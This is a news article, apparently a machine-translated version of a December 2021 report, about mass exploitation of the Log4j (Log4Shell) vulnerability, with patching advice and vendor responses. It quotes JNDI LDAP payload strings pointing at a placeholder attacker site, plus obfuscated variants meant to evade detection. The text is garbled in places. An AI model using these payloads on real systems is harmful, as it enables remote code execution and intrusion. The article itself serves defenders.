Criminals immediately used the widespread Log4j vulnerabilities to damage the system. Waves of real-time exploitation attempts were mainly focused on-at present-turning infected devices into botnet drones that mine cryptocurrency.
Check Point said this morning that it sees about 100 exploit attempts every minute, further detailing In a blog post.
Apache Log4j is an open source log library written in Java, used in many software packages and online systems around the world.last week It appeared Alibaba security engineer Chen Zhaojun discovered and privately disclosed details of a trivial remote code execution vulnerability on November 24 (CVE-2021-44228) In Log4j 2.x, especially 2.14.1 and earlier versions.
It can be used by providing specially crafted text fragments (such as messages or user names) to applications that use Log4j 2 to record this information. If the text contains a specific sequence of characters, the logging utility will eventually obtain the server controlled by the Java code attacker and execute it, allowing remote hijacking and control of the machine. It is easily infected and exists in all kinds of things, from Steam and Minecraft to spacecraft and Apple’s iCloud.
If you can imagine that the system records site search queries, browser user agent strings, failed login attempts, and other content provided by visitors and customers, and can weaponize these texts for code execution on the back end, you will Realizing how attractive this is to liars and liars.The vulnerability is commonly referred to as Log4Shell.
On December 9th, in response to Zhaojun’s discovery, Log4j version 2.15 was released Released Some available functions are disabled by default. This should be installed as a priority, or if you cannot update now, you should consider a mitigation measure.
The proof-of-concept code that abuses the insecure log library is also circulating on the Internet.This makes the whole situation dangerous, because the code is very common, easily exploitable, and has a lot of work Sample attack code Many systems are still unpatched. The severity of the defect is 10 points (out of 10 points).
System administrators and developers may try to use one of the available proof-of-concept vulnerabilities to see if their applications and many of their dependencies use logging libraries and are therefore vulnerable to the flaw-this is not a bad one The idea is fundamental. However, please keep in mind that those who use the service in the wild are likely to also patch Log4j after the initial compromise to prevent other criminals from entering. Therefore, you should consider reviewing your code, installing updates from vendors, and looking for signs of intrusion and that the software has been patched by the intruder.
Useful links
- One Gentle explanation Cygenta’s Log4j error
- More Technical failure Shift left
- NetEase Released Its so-called vaccine uses the flaw to disable the vulnerability in Log4j
- This is an Featured list Known indicators of compromise
- And one Large list of suppliers The patch is shipped because their product includes Log4j 2.x.Don’t forget: the application and server software containing the logging tool need to be distributed to users and installed
- Cloudflare CEO Matthew Prince Say His company discovered Log4j exploit attempts as early as December 1, and Cisco Say The next day it saw an attempt
At present, the information security industry is mainly ringing the alarm bell, telling the world that a very bad thing has been exposed-many people take this opportunity to launch their own security defense products, and we can’t help but notice. So far, the vulnerability seems to be mainly used to install encrypted mining robots on servers when scanning for devices at risk, although it is still too early.
Bitdefender stated that there has been an increase in scanning of “Russian-based IP addresses” on its honeypot network, which in itself is meaningless.Anyone can route their network traffic through a node located in Russia, and occasionally some this way For fun and profit.
Sophos warned that due to the successful Log4j compromise, the cryptocurrency mining botnet is one of the more popular post-exploitation payloads it has seen.The company is in a Blog post The botnet “focuses on Linux server platforms that are particularly vulnerable to this vulnerability.”
“Log4j is a library used by many products,” said Sean Gallagher, Sophos Senior Threat Researcher. “Therefore, it may exist in the darkest corners of the organization’s infrastructure. For example: any internally developed software. Finding all systems vulnerable to Log4Shell attacks should be the top priority of IT security.”
Sophos also warned of attempts to steal AWS private keys related to Log4j.For its part, the security department of Amazon Web Services Publish It’s talking about Log4j’s hot patching utility.
Various information security companies have started real-time blogs or posts that quickly update mitigation information, including Randori (one of the first Western companies to release detailed information) information Regarding remote code execution vulnerabilities) and Trend Micro, etc.
Microsoft released its own Log4j exploit Prevention advice, Said it mainly saw “attackers attempting to perform large-scale fingerprinting scans of vulnerable systems, as well as scans by security companies and researchers.”
Redmond said: “A sample attack pattern will appear in the web request log, which contains the following string:”
${jndi:ldap://[attacker site]/a}
“We have seen things like running lower or higher commands in exploit strings ({jndi:${lower:l}${lower:d}a${lower:p}) and more complex obfuscation attempts (${ ${::-j}${::-n}${::-d}${::-i}) are all trying to bypass string matching detection,” the Windows giant added.
Like the terrible big mistakes before, Log4Shell has a website, a hurried logo, a lot of headlines, and maybe a publishing agreement for three books and a movie. perhaps. Is it worth all this excitement? Well, it depends on how fast you patch. ®
Guide notes
F-Secure’s CISO Erka Koivunen responded to all the usual warnings, adding: “Unless you want an unexpected user experience, don’t change your Tesla or iPhone name to ${jndi:ldap://url/ a}.”
That would be a terrible thing. It’s annoying. So don’t do it. No, please don’t.
